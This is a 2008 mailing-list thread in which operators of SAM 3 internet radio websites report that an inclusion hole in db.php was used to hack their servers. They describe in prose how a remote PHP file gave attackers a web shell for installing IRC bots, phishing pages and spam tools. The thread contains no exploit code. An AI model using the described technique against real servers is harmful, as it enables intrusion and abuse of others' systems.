Yes My site was also hit. 3 phishing site and then because of mass email it brought it to its knees. And was traced back to the db.php This happened to my site Friday so about 6 days ago.
It is possible someone is going trhough the AudioRealm yp and looking at stations . Just a thought. ----- Original Message ----- From: "Roy Pait" <[email protected]> To: <[email protected]> Sent: Wednesday, January 09, 2008 12:39 PM Subject: Re: [General-discussion] PHP Website Vulnerability. Just so everyone knows, this is not a theoretical vuln. My server was hacked 5 days ago (fortunately minimally) and a couple of eggdrop (IRC relay) programs installed along with some extraneous PHP files (baca.php). It was fairly easily detected and cleaned up, but I tracked it back to db.php which was being used. I renamed the file (which of course stopped the web site) and then cleaned up. The basic premise is that the common setting is passed a url of a site with a php text file. This file is parsed and run on the local system, displays a web page (in php) with a command line area. From there it's a simple matter of issuing ftp requests and installing web (php or perl) apps. User has access at the level that the web server is running at. This was a slightly modified version of the SAM 3 default site, so the exploit's been there for a while, but is now known and hackers are actively looking for it. Google is real helpful in that respect based on the referrer listing just before the hack. Fortunately my firewall blocked most of what they were trying to do (IRC bot relay and spam generation triggered by the bot as I disallow IRC from all machines and SMTP is only available from the main server) Roy Pait >>> "James Henline" <[email protected]> 1/9/2008 9:36 AM >>> Please see the following news article for more information. http://www.spacialaudio.com/news/index.html?newsID=151 _______________________________________________ General-discussion mailing list [email protected] http://mailman.spacialaudio.com/mailman/listinfo/general-discussion TO unsubscribe to this list, simply send a blank email to [email protected] with the subject 'unsubscribe'
